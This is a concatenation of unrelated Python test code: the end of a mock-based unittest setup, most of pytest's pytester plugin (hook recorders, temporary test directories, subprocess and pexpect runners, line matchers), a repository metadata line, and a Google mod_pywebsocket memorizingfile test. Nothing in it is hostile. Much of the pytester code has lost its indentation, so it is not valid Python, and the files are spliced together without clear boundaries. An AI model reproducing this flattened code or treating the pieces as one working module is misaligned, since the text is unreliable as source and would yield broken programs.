        self.mock_http_resource_path = self.patch3.start()
        self.patch4.start()
        self.patch5.start()
        self.patch6.start()
        self.mock_user_query_manager = self.patch7.start()
        self.mock_user_query_manager.return_value.is_superuser.return_value = False
        self.mock_user_query_manager.return_value.is_authorized.return_value = True
        self.mock_uri_path = self.patch8.start()
        self.mock_uri_path.return_value = "/mock/"

    def tearDown(self):
        for patcher in self._patchers:
            patcher.stop()

    def validate_auth(self, operation):
        """
        validate that a validation check was performed for a given operation
        :param operation: the operation to validate
        """
        self.mock_user_query_manager.return_value.is_authorized.assert_called_once_with(
            mock.ANY, mock.ANY, operation)

    def get_mock_uri_path(self, *args):
        """
        Build a URI under the mocked '/mock/' root from the given segments.
        (The previous docstring documented a nonexistent ``object_id``
        parameter.)

        :param args: path components to join, e.g. an object id
        :type  args: str
        :return: joined path ending with a trailing slash
        :rtype:  str
        """
        return os.path.join('/mock', *args) + '/'
""" (disabled by default) support for testing pytest and pytest plugins. """
from __future__ import absolute_import, division, print_function
import codecs
import gc
import os
import platform
import re
import subprocess
import sys
import time
import traceback
from fnmatch import fnmatch
from weakref import WeakKeyDictionary
from _pytest.capture import MultiCapture, SysCapture
from _pytest._code import Source
import py
import pytest
from _pytest.main import Session, EXIT_OK
from _pytest.assertion.rewrite import AssertionRewritingHook
def pytest_addoption(parser):
    """Register pytester's command line options."""
    # group = parser.getgroup("pytester", "pytester (self-tests) options")
    parser.addoption(
        '--lsof', action="store_true", dest="lsof", default=False,
        help=("run FD checks if lsof is available"))
    parser.addoption(
        '--runpytest', default="inprocess", dest="runpytest",
        choices=("inprocess", "subprocess", ),
        help=("run pytest sub runs in tests using an 'inprocess' "
              "or 'subprocess' (python -m main) method"))
def pytest_configure(config):
    # This might be called multiple times. Only take the first.
    global _pytest_fullpath
    try:
        _pytest_fullpath
    except NameError:
        path = os.path.abspath(pytest.__file__.rstrip("oc"))
        _pytest_fullpath = path.replace("$py.class", ".py")

    if config.getvalue("lsof"):
        checker = LsofFdLeakChecker()
        if checker.matching_platform():
            config.pluginmanager.register(checker)
class LsofFdLeakChecker(object):
    """Plugin that reports file descriptors leaked by individual test items,
    using the output of lsof before and after each test protocol run."""

    def get_open_files(self):
        return self._parse_lsof_output(self._exec_lsof())

    def _exec_lsof(self):
        pid = os.getpid()
        return py.process.cmdexec("lsof -Ffn0 -p %d" % pid)

    def _parse_lsof_output(self, out):
        def isopen(line):
            return line.startswith('f') and ("deleted" not in line and
                                             'mem' not in line and
                                             "txt" not in line and
                                             'cwd' not in line)

        open_files = []
        for line in out.split("\n"):
            if not isopen(line):
                continue
            fields = line.split('\0')
            fd = fields[0][1:]
            filename = fields[1][1:]
            if filename.startswith('/'):
                open_files.append((fd, filename))
        return open_files

    def matching_platform(self):
        try:
            py.process.cmdexec("lsof -v")
        except (py.process.cmdexec.Error, UnicodeDecodeError):
            # cmdexec may raise UnicodeDecodeError on Windows systems
            # with locale other than english:
            # https://bitbucket.org/pytest-dev/py/issues/66
            return False
        else:
            return True

    @pytest.hookimpl(hookwrapper=True, tryfirst=True)
    def pytest_runtest_protocol(self, item):
        before = self.get_open_files()
        yield
        if hasattr(sys, "pypy_version_info"):
            gc.collect()
        after = self.get_open_files()
        new_fds = set(t[0] for t in after) - set(t[0] for t in before)
        leaked_files = [t for t in after if t[0] in new_fds]
        if leaked_files:
            error = ["***** %s FD leakage detected" % len(leaked_files)]
            error.extend(str(f) for f in leaked_files)
            error.append("*** Before:")
            error.extend(str(f) for f in before)
            error.append("*** After:")
            error.extend(str(f) for f in after)
            error.append(error[0])
            error.append("*** function %s:%s: %s " % item.location)
            error.append("See issue #2366")
            item.warn('', "\n".join(error))
# XXX copied from execnet's conftest.py - needs to be merged
winpymap = {
'python2.7': r'C:\Python27\python.exe',
'python2.6': r'C:\Python26\python.exe',
'python3.1': r'C:\Python31\python.exe',
'python3.2': r'C:\Python32\python.exe',
'python3.3': r'C:\Python33\python.exe',
'python3.4': r'C:\Python34\python.exe',
'python3.5': r'C:\Python35\python.exe',
}
def getexecutable(name, cache={}):
try:
return cache[name]
except KeyError:
executable = py.path.local.sysfind(name)
if executable:
import subprocess
popen = subprocess.Popen([str(executable), "--version"],
universal_newlines=True, stderr=subprocess.PIPE)
out, err = popen.communicate()
if name == "jython":
if not err or "2.5" not in err:
executable = None
if "2.5.2" in err:
executable = None # http://bugs.jython.org/issue1790
elif popen.returncode != 0:
# Handle pyenv's 127.
executable = None
cache[name] = executable
return executable
@pytest.fixture(params=['python2.6', 'python2.7', 'python3.3', "python3.4",
'pypy', 'pypy3'])
def anypython(request):
name = request.param
executable = getexecutable(name)
if executable is None:
if sys.platform == "win32":
executable = winpymap.get(name, None)
if executable:
executable = py.path.local(executable)
if executable.check():
return executable
pytest.skip("no suitable %s found" % (name,))
return executable
# used at least by pytest-xdist plugin
@pytest.fixture
def _pytest(request):
""" Return a helper which offers a gethookrecorder(hook)
method which returns a HookRecorder instance which helps
to make assertions about called hooks.
"""
return PytestArg(request)
class PytestArg:
def __init__(self, request):
self.request = request
def gethookrecorder(self, hook):
hookrecorder = HookRecorder(hook._pm)
self.request.addfinalizer(hookrecorder.finish_recording)
return hookrecorder
def get_public_names(l):
"""Only return names from iterator l without a leading underscore."""
return [x for x in l if x[0] != "_"]
class ParsedCall:
def __init__(self, name, kwargs):
self.__dict__.update(kwargs)
self._name = name
def __repr__(self):
d = self.__dict__.copy()
del d['_name']
return "<ParsedCall %r(**%r)>" % (self._name, d)
class HookRecorder:
"""Record all hooks called in a plugin manager.
This wraps all the hook calls in the plugin manager, recording
each call before propagating the normal calls.
"""
def __init__(self, pluginmanager):
self._pluginmanager = pluginmanager
self.calls = []
def before(hook_name, hook_impls, kwargs):
self.calls.append(ParsedCall(hook_name, kwargs))
def after(outcome, hook_name, hook_impls, kwargs):
pass
self._undo_wrapping = pluginmanager.add_hookcall_monitoring(before, after)
def finish_recording(self):
self._undo_wrapping()
def getcalls(self, names):
if isinstance(names, str):
names = names.split()
return [call for call in self.calls if call._name in names]
def assert_contains(self, entries):
__tracebackhide__ = True
i = 0
entries = list(entries)
backlocals = sys._getframe(1).f_locals
while entries:
name, check = entries.pop(0)
for ind, call in enumerate(self.calls[i:]):
if call._name == name:
print("NAMEMATCH", name, call)
if eval(check, backlocals, call.__dict__):
print("CHECKERMATCH", repr(check), "->", call)
else:
print("NOCHECKERMATCH", repr(check), "-", call)
continue
i += ind + 1
break
print("NONAMEMATCH", name, "with", call)
else:
pytest.fail("could not find %r check %r" % (name, check))
def popcall(self, name):
__tracebackhide__ = True
for i, call in enumerate(self.calls):
if call._name == name:
del self.calls[i]
return call
lines = ["could not find call %r, in:" % (name,)]
lines.extend([" %s" % str(x) for x in self.calls])
pytest.fail("\n".join(lines))
def getcall(self, name):
l = self.getcalls(name)
assert len(l) == 1, (name, l)
return l[0]
# functionality for test reports
def getreports(self,
names="pytest_runtest_logreport pytest_collectreport"):
return [x.report for x in self.getcalls(names)]
def matchreport(self, inamepart="",
names="pytest_runtest_logreport pytest_collectreport", when=None):
""" return a testreport whose dotted import path matches """
l = []
for rep in self.getreports(names=names):
try:
if not when and rep.when != "call" and rep.passed:
# setup/teardown passing reports - let's ignore those
continue
except AttributeError:
pass
if when and getattr(rep, 'when', None) != when:
continue
if not inamepart or inamepart in rep.nodeid.split("::"):
l.append(rep)
if not l:
raise ValueError("could not find test report matching %r: "
"no test reports at all!" % (inamepart,))
if len(l) > 1:
raise ValueError(
"found 2 or more testreports matching %r: %s" % (inamepart, l))
return l[0]
def getfailures(self,
names='pytest_runtest_logreport pytest_collectreport'):
return [rep for rep in self.getreports(names) if rep.failed]
def getfailedcollections(self):
return self.getfailures('pytest_collectreport')
def listoutcomes(self):
passed = []
skipped = []
failed = []
for rep in self.getreports(
"pytest_collectreport pytest_runtest_logreport"):
if rep.passed:
if getattr(rep, "when", None) == "call":
passed.append(rep)
elif rep.skipped:
skipped.append(rep)
elif rep.failed:
failed.append(rep)
return passed, skipped, failed
def countoutcomes(self):
return [len(x) for x in self.listoutcomes()]
def assertoutcome(self, passed=0, skipped=0, failed=0):
realpassed, realskipped, realfailed = self.listoutcomes()
assert passed == len(realpassed)
assert skipped == len(realskipped)
assert failed == len(realfailed)
def clear(self):
self.calls[:] = []
@pytest.fixture
def linecomp(request):
return LineComp()
@pytest.fixture(name='LineMatcher')
def LineMatcher_fixture(request):
return LineMatcher
@pytest.fixture
def testdir(request, tmpdir_factory):
return Testdir(request, tmpdir_factory)
rex_outcome = re.compile(r"(\d+) ([\w-]+)")
class RunResult:
"""The result of running a command.
Attributes:
:ret: The return value.
:outlines: List of lines captured from stdout.
:errlines: List of lines captures from stderr.
:stdout: :py:class:`LineMatcher` of stdout, use ``stdout.str()`` to
reconstruct stdout or the commonly used
``stdout.fnmatch_lines()`` method.
:stderrr: :py:class:`LineMatcher` of stderr.
:duration: Duration in seconds.
"""
def __init__(self, ret, outlines, errlines, duration):
self.ret = ret
self.outlines = outlines
self.errlines = errlines
self.stdout = LineMatcher(outlines)
self.stderr = LineMatcher(errlines)
self.duration = duration
def parseoutcomes(self):
""" Return a dictionary of outcomestring->num from parsing
the terminal output that the test process produced."""
for line in reversed(self.outlines):
if 'seconds' in line:
outcomes = rex_outcome.findall(line)
if outcomes:
d = {}
for num, cat in outcomes:
d[cat] = int(num)
return d
raise ValueError("Pytest terminal report not found")
def assert_outcomes(self, passed=0, skipped=0, failed=0, error=0):
""" assert that the specified outcomes appear with the respective
numbers (0 means it didn't occur) in the text output from a test run."""
d = self.parseoutcomes()
obtained = {
'passed': d.get('passed', 0),
'skipped': d.get('skipped', 0),
'failed': d.get('failed', 0),
'error': d.get('error', 0),
}
assert obtained == dict(passed=passed, skipped=skipped, failed=failed, error=error)
class Testdir:
"""Temporary test directory with tools to test/run pytest itself.
This is based on the ``tmpdir`` fixture but provides a number of
methods which aid with testing pytest itself. Unless
:py:meth:`chdir` is used all methods will use :py:attr:`tmpdir` as
current working directory.
Attributes:
:tmpdir: The :py:class:`py.path.local` instance of the temporary
directory.
:plugins: A list of plugins to use with :py:meth:`parseconfig` and
:py:meth:`runpytest`. Initially this is an empty list but
plugins can be added to the list. The type of items to add to
the list depend on the method which uses them so refer to them
for details.
"""
def __init__(self, request, tmpdir_factory):
self.request = request
self._mod_collections = WeakKeyDictionary()
# XXX remove duplication with tmpdir plugin
basetmp = tmpdir_factory.ensuretemp("testdir")
name = request.function.__name__
for i in range(100):
try:
tmpdir = basetmp.mkdir(name + str(i))
except py.error.EEXIST:
continue
break
self.tmpdir = tmpdir
self.plugins = []
self._savesyspath = (list(sys.path), list(sys.meta_path))
self._savemodulekeys = set(sys.modules)
self.chdir() # always chdir
self.request.addfinalizer(self.finalize)
method = self.request.config.getoption("--runpytest")
if method == "inprocess":
self._runpytest_method = self.runpytest_inprocess
elif method == "subprocess":
self._runpytest_method = self.runpytest_subprocess
def __repr__(self):
return "<Testdir %r>" % (self.tmpdir,)
def finalize(self):
"""Clean up global state artifacts.
Some methods modify the global interpreter state and this
tries to clean this up. It does not remove the temporary
directory however so it can be looked at after the test run
has finished.
"""
sys.path[:], sys.meta_path[:] = self._savesyspath
if hasattr(self, '_olddir'):
self._olddir.chdir()
self.delete_loaded_modules()
def delete_loaded_modules(self):
"""Delete modules that have been loaded during a test.
This allows the interpreter to catch module changes in case
the module is re-imported.
"""
for name in set(sys.modules).difference(self._savemodulekeys):
# some zope modules used by twisted-related tests keeps internal
# state and can't be deleted; we had some trouble in the past
# with zope.interface for example
if not name.startswith("zope"):
del sys.modules[name]
def make_hook_recorder(self, pluginmanager):
"""Create a new :py:class:`HookRecorder` for a PluginManager."""
assert not hasattr(pluginmanager, "reprec")
pluginmanager.reprec = reprec = HookRecorder(pluginmanager)
self.request.addfinalizer(reprec.finish_recording)
return reprec
def chdir(self):
"""Cd into the temporary directory.
This is done automatically upon instantiation.
"""
old = self.tmpdir.chdir()
if not hasattr(self, '_olddir'):
self._olddir = old
def _makefile(self, ext, args, kwargs, encoding="utf-8"):
items = list(kwargs.items())
if args:
source = py.builtin._totext("\n").join(
map(py.builtin._totext, args)) + py.builtin._totext("\n")
basename = self.request.function.__name__
items.insert(0, (basename, source))
ret = None
for name, value in items:
p = self.tmpdir.join(name).new(ext=ext)
p.dirpath().ensure_dir()
source = Source(value)
def my_totext(s, encoding="utf-8"):
if py.builtin._isbytes(s):
s = py.builtin._totext(s, encoding=encoding)
return s
source_unicode = "\n".join([my_totext(line) for line in source.lines])
source = py.builtin._totext(source_unicode)
content = source.strip().encode(encoding) # + "\n"
# content = content.rstrip() + "\n"
p.write(content, "wb")
if ret is None:
ret = p
return ret
def makefile(self, ext, *args, **kwargs):
"""Create a new file in the testdir.
ext: The extension the file should use, including the dot.
E.g. ".py".
args: All args will be treated as strings and joined using
newlines. The result will be written as contents to the
file. The name of the file will be based on the test
function requesting this fixture.
E.g. "testdir.makefile('.txt', 'line1', 'line2')"
kwargs: Each keyword is the name of a file, while the value of
it will be written as contents of the file.
E.g. "testdir.makefile('.ini', pytest='[pytest]\naddopts=-rs\n')"
"""
return self._makefile(ext, args, kwargs)
def makeconftest(self, source):
"""Write a contest.py file with 'source' as contents."""
return self.makepyfile(conftest=source)
def makeini(self, source):
"""Write a tox.ini file with 'source' as contents."""
return self.makefile('.ini', tox=source)
def getinicfg(self, source):
"""Return the pytest section from the tox.ini config file."""
p = self.makeini(source)
return py.iniconfig.IniConfig(p)['pytest']
def makepyfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .py extension."""
return self._makefile('.py', args, kwargs)
def maketxtfile(self, *args, **kwargs):
"""Shortcut for .makefile() with a .txt extension."""
return self._makefile('.txt', args, kwargs)
def syspathinsert(self, path=None):
"""Prepend a directory to sys.path, defaults to :py:attr:`tmpdir`.
This is undone automatically after the test.
"""
if path is None:
path = self.tmpdir
sys.path.insert(0, str(path))
# a call to syspathinsert() usually means that the caller
# wants to import some dynamically created files.
# with python3 we thus invalidate import caches.
self._possibly_invalidate_import_caches()
def _possibly_invalidate_import_caches(self):
# invalidate caches if we can (py33 and above)
try:
import importlib
except ImportError:
pass
else:
if hasattr(importlib, "invalidate_caches"):
importlib.invalidate_caches()
def mkdir(self, name):
"""Create a new (sub)directory."""
return self.tmpdir.mkdir(name)
def mkpydir(self, name):
"""Create a new python package.
This creates a (sub)directory with an empty ``__init__.py``
file so that is recognised as a python package.
"""
p = self.mkdir(name)
p.ensure("__init__.py")
return p
Session = Session
def getnode(self, config, arg):
"""Return the collection node of a file.
:param config: :py:class:`_pytest.config.Config` instance, see
:py:meth:`parseconfig` and :py:meth:`parseconfigure` to
create the configuration.
:param arg: A :py:class:`py.path.local` instance of the file.
"""
session = Session(config)
assert '::' not in str(arg)
p = py.path.local(arg)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([str(p)], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def getpathnode(self, path):
"""Return the collection node of a file.
This is like :py:meth:`getnode` but uses
:py:meth:`parseconfigure` to create the (configured) pytest
Config instance.
:param path: A :py:class:`py.path.local` instance of the file.
"""
config = self.parseconfigure(path)
session = Session(config)
x = session.fspath.bestrelpath(path)
config.hook.pytest_sessionstart(session=session)
res = session.perform_collect([x], genitems=False)[0]
config.hook.pytest_sessionfinish(session=session, exitstatus=EXIT_OK)
return res
def genitems(self, colitems):
"""Generate all test items from a collection node.
This recurses into the collection node and returns a list of
all the test items contained within.
"""
session = colitems[0].session
result = []
for colitem in colitems:
result.extend(session.genitems(colitem))
return result
def runitem(self, source):
"""Run the "test_func" Item.
The calling test instance (the class which contains the test
method) must provide a ``.getrunner()`` method which should
return a runner which can run the test protocol for a single
item, like e.g. :py:func:`_pytest.runner.runtestprotocol`.
"""
# used from runner functional tests
item = self.getitem(source)
# the test class where we are called from wants to provide the runner
testclassinstance = self.request.instance
runner = testclassinstance.getrunner()
return runner(item)
def inline_runsource(self, source, *cmdlineargs):
"""Run a test module in process using ``pytest.main()``.
This run writes "source" into a temporary file and runs
``pytest.main()`` on it, returning a :py:class:`HookRecorder`
instance for the result.
:param source: The source code of the test module.
:param cmdlineargs: Any extra command line arguments to use.
:return: :py:class:`HookRecorder` instance of the result.
"""
p = self.makepyfile(source)
l = list(cmdlineargs) + [p]
return self.inline_run(*l)
def inline_genitems(self, *args):
"""Run ``pytest.main(['--collectonly'])`` in-process.
Returns a tuple of the collected items and a
:py:class:`HookRecorder` instance.
This runs the :py:func:`pytest.main` function to run all of
pytest inside the test process itself like
:py:meth:`inline_run`. However the return value is a tuple of
the collection items and a :py:class:`HookRecorder` instance.
"""
rec = self.inline_run("--collect-only", *args)
items = [x.item for x in rec.getcalls("pytest_itemcollected")]
return items, rec
def inline_run(self, *args, **kwargs):
"""Run ``pytest.main()`` in-process, returning a HookRecorder.
This runs the :py:func:`pytest.main` function to run all of
pytest inside the test process itself. This means it can
return a :py:class:`HookRecorder` instance which gives more
detailed results from then run then can be done by matching
stdout/stderr from :py:meth:`runpytest`.
:param args: Any command line arguments to pass to
:py:func:`pytest.main`.
:param plugin: (keyword-only) Extra plugin instances the
``pytest.main()`` instance should use.
:return: A :py:class:`HookRecorder` instance.
"""
# When running py.test inline any plugins active in the main
# test process are already imported. So this disables the
# warning which will trigger to say they can no longer be
# re-written, which is fine as they are already re-written.
orig_warn = AssertionRewritingHook._warn_already_imported
def revert():
AssertionRewritingHook._warn_already_imported = orig_warn
self.request.addfinalizer(revert)
AssertionRewritingHook._warn_already_imported = lambda *a: None
rec = []
class Collect:
def pytest_configure(x, config):
rec.append(self.make_hook_recorder(config.pluginmanager))
plugins = kwargs.get("plugins") or []
plugins.append(Collect())
ret = pytest.main(list(args), plugins=plugins)
self.delete_loaded_modules()
if len(rec) == 1:
reprec = rec.pop()
else:
class reprec:
pass
reprec.ret = ret
# typically we reraise keyboard interrupts from the child run
# because it's our user requesting interruption of the testing
if ret == 2 and not kwargs.get("no_reraise_ctrlc"):
calls = reprec.getcalls("pytest_keyboard_interrupt")
if calls and calls[-1].excinfo.type == KeyboardInterrupt:
raise KeyboardInterrupt()
return reprec
def runpytest_inprocess(self, *args, **kwargs):
""" Return result of running pytest in-process, providing a similar
interface to what self.runpytest() provides. """
if kwargs.get("syspathinsert"):
self.syspathinsert()
now = time.time()
capture = MultiCapture(Capture=SysCapture)
capture.start_capturing()
try:
try:
reprec = self.inline_run(*args, **kwargs)
except SystemExit as e:
class reprec:
ret = e.args[0]
except Exception:
traceback.print_exc()
class reprec:
ret = 3
finally:
out, err = capture.readouterr()
capture.stop_capturing()
sys.stdout.write(out)
sys.stderr.write(err)
res = RunResult(reprec.ret,
out.split("\n"), err.split("\n"),
time.time() - now)
res.reprec = reprec
return res
def runpytest(self, *args, **kwargs):
""" Run pytest inline or in a subprocess, depending on the command line
option "--runpytest" and return a :py:class:`RunResult`.
"""
args = self._ensure_basetemp(args)
return self._runpytest_method(*args, **kwargs)
def _ensure_basetemp(self, args):
args = [str(x) for x in args]
for x in args:
if str(x).startswith('--basetemp'):
# print("basedtemp exists: %s" %(args,))
break
else:
args.append("--basetemp=%s" % self.tmpdir.dirpath('basetemp'))
# print("added basetemp: %s" %(args,))
return args
def parseconfig(self, *args):
"""Return a new pytest Config instance from given commandline args.
This invokes the pytest bootstrapping code in _pytest.config
to create a new :py:class:`_pytest.core.PluginManager` and
call the pytest_cmdline_parse hook to create new
:py:class:`_pytest.config.Config` instance.
If :py:attr:`plugins` has been populated they should be plugin
modules which will be registered with the PluginManager.
"""
args = self._ensure_basetemp(args)
import _pytest.config
config = _pytest.config._prepareconfig(args, self.plugins)
# we don't know what the test will do with this half-setup config
# object and thus we make sure it gets unconfigured properly in any
# case (otherwise capturing could still be active, for example)
self.request.addfinalizer(config._ensure_unconfigure)
return config
def parseconfigure(self, *args):
"""Return a new pytest configured Config instance.
This returns a new :py:class:`_pytest.config.Config` instance
like :py:meth:`parseconfig`, but also calls the
pytest_configure hook.
"""
config = self.parseconfig(*args)
config._do_configure()
self.request.addfinalizer(config._ensure_unconfigure)
return config
def getitem(self, source, funcname="test_func"):
"""Return the test item for a test function.
This writes the source to a python file and runs pytest's
collection on the resulting module, returning the test item
for the requested function name.
:param source: The module source.
:param funcname: The name of the test function for which the
Item must be returned.
"""
items = self.getitems(source)
for item in items:
if item.name == funcname:
return item
assert 0, "%r item not found in module:\n%s\nitems: %s" % (
funcname, source, items)
def getitems(self, source):
"""Return all test items collected from the module.
This writes the source to a python file and runs pytest's
collection on the resulting module, returning all test items
contained within.
"""
modcol = self.getmodulecol(source)
return self.genitems([modcol])
def getmodulecol(self, source, configargs=(), withinit=False):
"""Return the module collection node for ``source``.
This writes ``source`` to a file using :py:meth:`makepyfile`
and then runs the pytest collection on it, returning the
collection node for the test module.
:param source: The source code of the module to collect.
:param configargs: Any extra arguments to pass to
:py:meth:`parseconfigure`.
:param withinit: Whether to also write a ``__init__.py`` file
to the temporary directory to ensure it is a package.
"""
kw = {self.request.function.__name__: Source(source).strip()}
path = self.makepyfile(**kw)
if withinit:
self.makepyfile(__init__="#")
self.config = config = self.parseconfigure(path, *configargs)
node = self.getnode(config, path)
return node
def collect_by_name(self, modcol, name):
"""Return the collection node for name from the module collection.
This will search a module collection node for a collection
node matching the given name.
:param modcol: A module collection node, see
:py:meth:`getmodulecol`.
:param name: The name of the node to return.
"""
if modcol not in self._mod_collections:
self._mod_collections[modcol] = list(modcol.collect())
for colitem in self._mod_collections[modcol]:
if colitem.name == name:
return colitem
def popen(self, cmdargs, stdout, stderr, **kw):
"""Invoke subprocess.Popen.
This calls subprocess.Popen making sure the current working
directory is the PYTHONPATH.
You probably want to use :py:meth:`run` instead.
"""
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(filter(None, [
str(os.getcwd()), env.get('PYTHONPATH', '')]))
kw['env'] = env
popen = subprocess.Popen(cmdargs, stdin=subprocess.PIPE, stdout=stdout, stderr=stderr, **kw)
popen.stdin.close()
return popen
def run(self, *cmdargs):
"""Run a command with arguments.
Run a process using subprocess.Popen saving the stdout and
stderr.
Returns a :py:class:`RunResult`.
"""
return self._run(*cmdargs)
def _run(self, *cmdargs):
cmdargs = [str(x) for x in cmdargs]
p1 = self.tmpdir.join("stdout")
p2 = self.tmpdir.join("stderr")
print("running:", ' '.join(cmdargs))
print(" in:", str(py.path.local()))
f1 = codecs.open(str(p1), "w", encoding="utf8")
f2 = codecs.open(str(p2), "w", encoding="utf8")
try:
now = time.time()
popen = self.popen(cmdargs, stdout=f1, stderr=f2,
close_fds=(sys.platform != "win32"))
ret = popen.wait()
finally:
f1.close()
f2.close()
f1 = codecs.open(str(p1), "r", encoding="utf8")
f2 = codecs.open(str(p2), "r", encoding="utf8")
try:
out = f1.read().splitlines()
err = f2.read().splitlines()
finally:
f1.close()
f2.close()
self._dump_lines(out, sys.stdout)
self._dump_lines(err, sys.stderr)
return RunResult(ret, out, err, time.time() - now)
def _dump_lines(self, lines, fp):
try:
for line in lines:
print(line, file=fp)
except UnicodeEncodeError:
print("couldn't print to %s because of encoding" % (fp,))
def _getpytestargs(self):
# we cannot use "(sys.executable,script)"
# because on windows the script is e.g. a pytest.exe
return (sys.executable, _pytest_fullpath,) # noqa
def runpython(self, script):
"""Run a python script using sys.executable as interpreter.
Returns a :py:class:`RunResult`.
"""
return self.run(sys.executable, script)
def runpython_c(self, command):
"""Run python -c "command", return a :py:class:`RunResult`."""
return self.run(sys.executable, "-c", command)
def runpytest_subprocess(self, *args, **kwargs):
"""Run pytest as a subprocess with given arguments.
Any plugins added to the :py:attr:`plugins` list will added
using the ``-p`` command line option. Addtionally
``--basetemp`` is used put any temporary files and directories
in a numbered directory prefixed with "runpytest-" so they do
not conflict with the normal numberd pytest location for
temporary files and directories.
Returns a :py:class:`RunResult`.
"""
p = py.path.local.make_numbered_dir(prefix="runpytest-",
keep=None, rootdir=self.tmpdir)
args = ('--basetemp=%s' % p, ) + args
# for x in args:
# if '--confcutdir' in str(x):
# break
# else:
# pass
# args = ('--confcutdir=.',) + args
plugins = [x for x in self.plugins if isinstance(x, str)]
if plugins:
args = ('-p', plugins[0]) + args
args = self._getpytestargs() + args
return self.run(*args)
def spawn_pytest(self, string, expect_timeout=10.0):
"""Run pytest using pexpect.
This makes sure to use the right pytest and sets up the
temporary directory locations.
The pexpect child is returned.
"""
basetemp = self.tmpdir.mkdir("temp-pexpect")
invoke = " ".join(map(str, self._getpytestargs()))
cmd = "%s --basetemp=%s %s" % (invoke, basetemp, string)
return self.spawn(cmd, expect_timeout=expect_timeout)
def spawn(self, cmd, expect_timeout=10.0):
"""Run a command using pexpect.
The pexpect child is returned.
"""
pexpect = pytest.importorskip("pexpect", "3.0")
if hasattr(sys, 'pypy_version_info') and '64' in platform.machine():
pytest.skip("pypy-64 bit not supported")
if sys.platform.startswith("freebsd"):
pytest.xfail("pexpect does not work reliably on freebsd")
logfile = self.tmpdir.join("spawn.out").open("wb")
child = pexpect.spawn(cmd, logfile=logfile)
self.request.addfinalizer(logfile.close)
child.timeout = expect_timeout
return child
def getdecoded(out):
try:
return out.decode("utf-8")
except UnicodeDecodeError:
return "INTERNAL not-utf8-decodeable, truncated string:\n%s" % (
py.io.saferepr(out),)
class LineComp:
def __init__(self):
self.stringio = py.io.TextIO()
def assert_contains_lines(self, lines2):
""" assert that lines2 are contained (linearly) in lines1.
return a list of extralines found.
"""
__tracebackhide__ = True
val = self.stringio.getvalue()
self.stringio.truncate(0)
self.stringio.seek(0)
lines1 = val.split("\n")
return LineMatcher(lines1).fnmatch_lines(lines2)
class LineMatcher:
"""Flexible matching of text.
This is a convenience class to test large texts like the output of
commands.
The constructor takes a list of lines without their trailing
newlines, i.e. ``text.splitlines()``.
"""
def __init__(self, lines):
self.lines = lines
self._log_output = []
def str(self):
"""Return the entire original text."""
return "\n".join(self.lines)
def _getlines(self, lines2):
if isinstance(lines2, str):
lines2 = Source(lines2)
if isinstance(lines2, Source):
lines2 = lines2.strip().lines
return lines2
def fnmatch_lines_random(self, lines2):
"""Check lines exist in the output.
The argument is a list of lines which have to occur in the
output, in any order. Each line can contain glob whildcards.
"""
lines2 = self._getlines(lines2)
for line in lines2:
for x in self.lines:
if line == x or fnmatch(x, line):
self._log("matched: ", repr(line))
break
else:
self._log("line %r not found in output" % line)
raise ValueError(self._log_text)
def get_lines_after(self, fnline):
"""Return all lines following the given line in the text.
The given line can contain glob wildcards.
"""
for i, line in enumerate(self.lines):
if fnline == line or fnmatch(line, fnline):
return self.lines[i + 1:]
raise ValueError("line %r not found in output" % fnline)
def _log(self, *args):
self._log_output.append(' '.join((str(x) for x in args)))
@property
def _log_text(self):
return '\n'.join(self._log_output)
def fnmatch_lines(self, lines2):
"""Search the text for matching lines.
The argument is a list of lines which have to match and can
use glob wildcards. If they do not match an pytest.fail() is
called. The matches and non-matches are also printed on
stdout.
"""
lines2 = self._getlines(lines2)
lines1 = self.lines[:]
nextline = None
extralines = []
__tracebackhide__ = True
for line in lines2:
nomatchprinted = False
while lines1:
nextline = lines1.pop(0)
if line == nextline:
self._log("exact match:", repr(line))
break
elif fnmatch(nextline, line):
self._log("fnmatch:", repr(line))
self._log(" with:", repr(nextline))
break
else:
if not nomatchprinted:
self._log("nomatch:", repr(line))
nomatchprinted = True
self._log(" and:", repr(nextline))
extralines.append(nextline)
else:
self._log("remains unmatched: %r" % (line,))
pytest.fail(self._log_text)
| hoehnp/navit_test | lib/python2.7/site-packages/_pytest/pytester.py | Python | gpl-2.0 | 40,423 |
#!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for memorizingfile module."""
import StringIO
import unittest
import config # This must be imported before mod_pywebsocket.
from mod_pywebsocket import memorizingfile
class UtilTest(unittest.TestCase):
def check(self, memorizing_file, num_read, expected_list):
for unused in range(num_read):
memorizing_file.readline()
actual_list = memorizing_file.get_memorized_lines()
self.assertEqual(len(expected_list), len(actual_list))
for expected, actual in zip(expected_list, actual_list):
self.assertEqual(expected, actual)
def test_get_memorized_lines(self):
memorizing_file = memorizingfile.MemorizingFile(StringIO.StringIO(
'Hello\nWorld\nWelcome'))
self.check(memorizing_file, 3, ['Hello\n', 'World\n', 'Welcome'])
